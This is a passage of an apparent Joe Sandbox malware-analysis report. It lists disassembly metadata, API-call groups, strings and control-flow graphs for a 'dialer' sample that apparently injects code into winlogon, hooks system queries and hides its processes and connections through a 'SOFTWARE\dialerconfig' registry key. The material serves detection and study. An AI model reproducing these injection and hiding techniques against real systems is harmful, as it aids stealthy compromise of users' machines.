                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                              • String ID: @
                                                              • API String ID: 3462610200-2766056989
                                                              • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                              • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                              • String ID: dialersvc64
                                                              • API String ID: 4184240511-3881820561
                                                              • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                              • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Delete$CloseEnumOpen
                                                              • String ID: SOFTWARE\dialerconfig
                                                              • API String ID: 3013565938-461861421
                                                              • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                              • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: File$Write$CloseCreateHandle
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 148219782-3440882674
                                                              • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                              • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ntdll.dll
                                                              • API String ID: 1646373207-2227199552
                                                              • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                              • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                              Execution Graph

                                                              Execution Coverage: 1%
                                                              Dynamic/Decrypted Code Coverage: 94.6%
                                                              Signature Coverage: 0%
                                                              Total number of Nodes: 112
                                                              Total number of Limit Nodes: 18

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 406a7c028b3c229bdc1c75f8301e19e1701b13e4dfdd540bc7c265abecc9bc67
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 47712D7E328E60A6EB109FA9E85869D33B4F784F9AF509111DE4E47B69EF34C444C740

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: 5b5ece5b16f05410ef88fc7334ca4b30fcb2165cfe8f9a178b0778bd0effcbe9
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 96118B2A318F5493EF549BA9E408269B2A0FB88F86F148038DF8A03B94EF3DC505C704

                                                              Control-flow Graph

                                                              control_flow_graph 59 225dc645b30-225dc645b57 60 225dc645b59-225dc645b68 59->60 61 225dc645b6b-225dc645b76 GetCurrentThreadId 59->61 60->61 62 225dc645b78-225dc645b7d 61->62 63 225dc645b82-225dc645b89 61->63 64 225dc645faf-225dc645fc6 call 225dc647940 62->64 65 225dc645b9b-225dc645baf 63->65 66 225dc645b8b-225dc645b96 call 225dc645960 63->66 69 225dc645bbe-225dc645bc4 65->69 66->64 72 225dc645bca-225dc645bd3 69->72 73 225dc645c95-225dc645cb6 69->73 75 225dc645c1a-225dc645c8d call 225dc644510 call 225dc6444b0 call 225dc644470 72->75 76 225dc645bd5-225dc645c18 call 225dc6485c0 72->76 78 225dc645cbc-225dc645cdc GetThreadContext 73->78 79 225dc645e1f-225dc645e30 call 225dc6474bf 73->79 87 225dc645c90 75->87 76->87 83 225dc645e1a 78->83 84 225dc645ce2-225dc645d03 78->84 90 225dc645e35-225dc645e3b 79->90 83->79 84->83 93 225dc645d09-225dc645d12 84->93 87->69 94 225dc645e41-225dc645e98 VirtualProtect FlushInstructionCache 90->94 95 225dc645efe-225dc645f0e 90->95 97 225dc645d92-225dc645da3 93->97 98 225dc645d14-225dc645d25 93->98 101 225dc645ec9-225dc645ef9 call 225dc6478ac 94->101 102 225dc645e9a-225dc645ea4 94->102 106 225dc645f1e-225dc645f2a call 225dc644df0 95->106 107 225dc645f10-225dc645f17 95->107 103 225dc645e15 97->103 104 225dc645da5-225dc645dc3 97->104 99 225dc645d27-225dc645d3c 98->99 100 225dc645d8d 98->100 99->100 108 225dc645d3e-225dc645d88 call 225dc643970 SetThreadContext 99->108 100->103 101->90 102->101 109 225dc645ea6-225dc645ec1 call 225dc644390 102->109 104->103 110 225dc645dc5-225dc645e10 call 225dc643900 call 225dc6474dd 104->110 120 225dc645f2f-225dc645f35 106->120 107->106 112 225dc645f19 call 225dc6443e0 107->112 108->100 109->101 110->103 112->106 124 225dc645f77-225dc645f95 120->124 125 225dc645f37-225dc645f75 ResumeThread call 225dc6478ac 120->125 128 225dc645fa9 124->128 129 225dc645f97-225dc645fa6 124->129 125->120 128->64 129->128
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                              • Instruction ID: f245da02ec037058e9828f5728e6f8f7909b60f63258dcba4de34453af5a61e8
                                                              • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                              • Instruction Fuzzy Hash: B9D1997A20CF9896DA70DB4AE49835A7BA0F7C8B85F104156EACE47BA5DF3CC541CB40

                                                              Control-flow Graph

                                                              control_flow_graph 131 225dc6450d0-225dc6450fc 132 225dc64510d-225dc645116 131->132 133 225dc6450fe-225dc645106 131->133 134 225dc645127-225dc645130 132->134 135 225dc645118-225dc645120 132->135 133->132 136 225dc645141-225dc64514a 134->136 137 225dc645132-225dc64513a 134->137 135->134 138 225dc64514c-225dc645151 136->138 139 225dc645156-225dc645161 GetCurrentThreadId 136->139 137->136 140 225dc6456d3-225dc6456da 138->140 141 225dc645163-225dc645168 139->141 142 225dc64516d-225dc645174 139->142 141->140 143 225dc645176-225dc64517c 142->143 144 225dc645181-225dc64518a 142->144 143->140 145 225dc64518c-225dc645191 144->145 146 225dc645196-225dc6451a2 144->146 145->140 147 225dc6451a4-225dc6451c9 146->147 148 225dc6451ce-225dc645225 call 225dc6456e0 * 2 146->148 147->140 153 225dc64523a-225dc645243 148->153 154 225dc645227-225dc64522e 148->154 157 225dc645255-225dc64525e 153->157 158 225dc645245-225dc645252 153->158 155 225dc645236 154->155 156 225dc645230 154->156 155->153 162 225dc6452a6-225dc6452aa 155->162 161 225dc6452b0-225dc6452b6 156->161 159 225dc645273-225dc645298 call 225dc647870 157->159 160 225dc645260-225dc645270 157->160 158->157 170 225dc64532d-225dc645342 call 225dc643cc0 159->170 171 225dc64529e 159->171 160->159 164 225dc6452e5-225dc6452eb 161->164 165 225dc6452b8-225dc6452d4 call 225dc644390 161->165 162->161 168 225dc645315-225dc645328 164->168 169 225dc6452ed-225dc64530c call 225dc6478ac 164->169 165->164 175 225dc6452d6-225dc6452de 165->175 168->140 169->168 178 225dc645351-225dc64535a 170->178 179 225dc645344-225dc64534c 170->179 171->162 175->164 180 225dc64536c-225dc6453ba call 225dc648c60 178->180 181 225dc64535c-225dc645369 178->181 179->162 184 225dc6453c2-225dc6453ca 180->184 181->180 185 225dc6454d7-225dc6454df 184->185 186 225dc6453d0-225dc6454bb call 225dc647440 184->186 187 225dc6454e1-225dc6454f4 call 225dc644590 185->187 188 225dc645523-225dc64552b 185->188 198 225dc6454bd 186->198 199 225dc6454bf-225dc6454ce call 225dc644060 186->199 200 225dc6454f6 187->200 201 225dc6454f8-225dc645521 187->201 191 225dc645537-225dc645546 188->191 192 225dc64552d-225dc645535 188->192 196 225dc645548 191->196 197 225dc64554f 191->197 192->191 195 225dc645554-225dc645561 192->195 202 225dc645563 195->202 203 225dc645564-225dc6455b9 call 225dc6485c0 195->203 196->197 197->195 198->185 207 225dc6454d2 199->207 208 225dc6454d0 199->208 200->188 201->185 202->203 210 225dc6455bb-225dc6455c3 203->210 211 225dc6455c8-225dc645661 call 225dc644510 call 225dc644470 VirtualProtect 203->211 207->184 208->185 216 225dc645671-225dc6456d1 211->216 217 225dc645663-225dc645668 GetLastError 211->217 216->140 217->216
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread
                                                              • String ID:
                                                              • API String ID: 2882836952-0
                                                              • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                              • Instruction ID: ca8f9a462bd9996edb27ee4ecd3a9b3d43bbe2f9124c1ca87dd336038b8394af
                                                              • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                                                              • Instruction Fuzzy Hash: 1102C83661DF9496EB60CB99E49436AB7A1F3C4795F104056EA8E87BA8DF7CC444CF00

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocQuery
                                                              • String ID:
                                                              • API String ID: 31662377-0
                                                              • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction ID: 3d7c28a49f1379a387e1eab8d3c47744672dc9424a01523034e22865a73a9f88
                                                              • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                              • Instruction Fuzzy Hash: 7F31302625DE98A1EA30DB9DE05835E76A1F388B85F108575F6CF46BA8DF7CC180CB04

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                              • String ID:
                                                              • API String ID: 1683269324-0
                                                              • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction ID: 7d3d60018f90cf45d3bc6b126cf75a44508ad4678cf0a9f52ef5460c3c2565a3
                                                              • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                              • Instruction Fuzzy Hash: 7011C07C62CEA8B2FB619BE8F90C3993295AB54B47F50C1B4EB0781690EF78C044C240

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                              • String ID:
                                                              • API String ID: 3733156554-0
                                                              • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                              • Instruction ID: 7e590623df8fc7209075b22fdaf8685971673eb90f371bc8902be2096d1f9670
                                                              • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                                                              • Instruction Fuzzy Hash: 9FF03A2A21CF24D0D630DB89E44976ABBA0F788BD5F148151FA8E43B69CE3CC681CF00

                                                              Control-flow Graph

                                                              control_flow_graph 265 225dc61273c-225dc6127a4 call 225dc6129d4 * 4 274 225dc6127aa-225dc6127ad 265->274 275 225dc6129b2 265->275 274->275 277 225dc6127b3-225dc6127b6 274->277 276 225dc6129b4-225dc6129d0 275->276 277->275 278 225dc6127bc-225dc6127bf 277->278 278->275 279 225dc6127c5-225dc6127e6 VirtualAlloc 278->279 279->275 280 225dc6127ec-225dc61280c 279->280 281 225dc612838-225dc61283f 280->281 282 225dc61280e-225dc612836 280->282 283 225dc612845-225dc612852 281->283 284 225dc6128df-225dc6128e6 281->284 282->281 282->282 283->284 285 225dc612858-225dc61286a LoadLibraryA 283->285 286 225dc6128ec-225dc612901 284->286 287 225dc612992-225dc6129b0 284->287 288 225dc6128ca-225dc6128d2 285->288 289 225dc61286c-225dc612878 285->289 286->287 290 225dc612907 286->290 287->276 288->285 292 225dc6128d4-225dc6128d9 288->292 291 225dc6128c5-225dc6128c8 289->291 294 225dc61290d-225dc612921 290->294 291->288 297 225dc61287a-225dc61287d 291->297 292->284 295 225dc612982-225dc61298c 294->295 296 225dc612923-225dc612934 294->296 295->287 295->294 298 225dc612936-225dc61293d 296->298 299 225dc61293f-225dc612943 296->299 300 225dc6128a7-225dc6128b7 297->300 301 225dc61287f-225dc6128a5 297->301 303 225dc612970-225dc612980 298->303 304 225dc612945-225dc61294b 299->304 305 225dc61294d-225dc612951 299->305 306 225dc6128ba-225dc6128c1 300->306 301->306 303->295 303->296 304->303 307 225dc612963-225dc612967 305->307 308 225dc612953-225dc612961 305->308 306->291 307->303 310 225dc612969-225dc61296c 307->310 308->303 310->303
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070618302.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc610000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AllocLibraryLoadVirtual
                                                              • String ID:
                                                              • API String ID: 3550616410-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: b5a9ffdff3e85ff3f1f12f145a610503c53f3502f35e5ceb3ac916478b11310c
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: D261363AB02AA097DF56CF5ED00876DB392F754BA6F18C521CE5907788DA38D852C700

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00000225DC641628: GetProcessHeap.KERNEL32 ref: 00000225DC641633
                                                                • Part of subcall function 00000225DC641628: HeapAlloc.KERNEL32 ref: 00000225DC641642
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416B2
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6416DF
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6416F9
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641719
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641734
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641754
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64176F
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64178F
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417AA
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC6417CA
                                                              • Sleep.KERNEL32 ref: 00000225DC641AD7
                                                              • SleepEx.KERNELBASE ref: 00000225DC641ADD
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6417E5
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641805
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641820
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC641840
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC64185B
                                                                • Part of subcall function 00000225DC641628: RegOpenKeyExW.ADVAPI32 ref: 00000225DC64187B
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC641896
                                                                • Part of subcall function 00000225DC641628: RegCloseKey.ADVAPI32 ref: 00000225DC6418A0
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: b89290e72799dd3975187c06206b195ef9f7eec7f326f7ac498d84b976088364
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 0731356921CE61B2FF509BAED6593A933A4AB54BC6F04D4A19E0F873E5FF30C451C210

                                                              Control-flow Graph

                                                              control_flow_graph 350 225dc67273c-225dc6727a4 call 225dc6729d4 * 4 359 225dc6727aa-225dc6727ad 350->359 360 225dc6729b2 350->360 359->360 362 225dc6727b3-225dc6727b6 359->362 361 225dc6729b4-225dc6729d0 360->361 362->360 363 225dc6727bc-225dc6727bf 362->363 363->360 364 225dc6727c5-225dc6727e6 VirtualAlloc 363->364 364->360 365 225dc6727ec-225dc67280c 364->365 366 225dc672838-225dc67283f 365->366 367 225dc67280e-225dc672836 365->367 368 225dc672845-225dc672852 366->368 369 225dc6728df-225dc6728e6 366->369 367->366 367->367 368->369 372 225dc672858-225dc67286a 368->372 370 225dc6728ec-225dc672901 369->370 371 225dc672992-225dc6729b0 369->371 370->371 373 225dc672907 370->373 371->361 379 225dc67286c-225dc672878 372->379 380 225dc6728ca-225dc6728d2 372->380 374 225dc67290d-225dc672921 373->374 377 225dc672923-225dc672934 374->377 378 225dc672982-225dc67298c 374->378 382 225dc672936-225dc67293d 377->382 383 225dc67293f-225dc672943 377->383 378->371 378->374 384 225dc6728c5-225dc6728c8 379->384 380->372 385 225dc6728d4-225dc6728d9 380->385 386 225dc672970-225dc672980 382->386 387 225dc672945-225dc67294b 383->387 388 225dc67294d-225dc672951 383->388 384->380 389 225dc67287a-225dc67287d 384->389 385->369 386->377 386->378 387->386 392 225dc672963-225dc672967 388->392 393 225dc672953-225dc672961 388->393 390 225dc6728a7-225dc6728b7 389->390 391 225dc67287f-225dc6728a5 389->391 394 225dc6728ba-225dc6728c1 390->394 391->394 392->386 395 225dc672969-225dc67296c 392->395 393->386 394->384 395->386
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: c822286e1b467df8a310eb99b0d592360f537eec13a50740bd2f5dfddf19021e
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: A561483AB01AA0D7DB56CF9AD00876DB3A2F754BA5F18C921CF5907BC8DA38D852C700

                                                              Control-flow Graph

                                                              control_flow_graph 397 225dc6ad6cc-225dc6ad6db 398 225dc6ad6dd-225dc6ad6e9 397->398 399 225dc6ad6eb-225dc6ad6fb 397->399 398->399 400 225dc6ad72e-225dc6ad739 call 225dc6ad6ac 398->400 401 225dc6ad712-225dc6ad72a HeapAlloc 399->401 407 225dc6ad73b-225dc6ad740 400->407 402 225dc6ad6fd-225dc6ad704 call 225dc6b0720 401->402 403 225dc6ad72c 401->403 402->400 409 225dc6ad706-225dc6ad710 call 225dc6ab85c 402->409 403->407 409->400 409->401
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap
                                                              • String ID:
                                                              • API String ID: 4292702814-0
                                                              • Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction ID: d48ce241fd5c6b57c9d66a3839ec59588558f897ab86195e616c0656e38ee758
                                                              • Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
                                                              • Instruction Fuzzy Hash: 21F05E6C301E2161FE6DDBEE995D3A552955F89B82F6CE4344D0AC67E2EE3CC481C620
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 02e5d621d8295eb5dd385e75f9606a0c78f62cf6da70878d64f9e7b1c174dd69
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: DCB1B47A21CE60A6EB968FEDC4487A973A5F744B8AF24D056DE0A53B94DF34CC41C340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 8b409eee056ac65ba81e46254c59d85845063fb26c80b4bd130284c66f771075
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 96B1B37A290E60A2EBAADFADC44876963A5F744B86F24D016DE0DD3B95DF35CC81C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
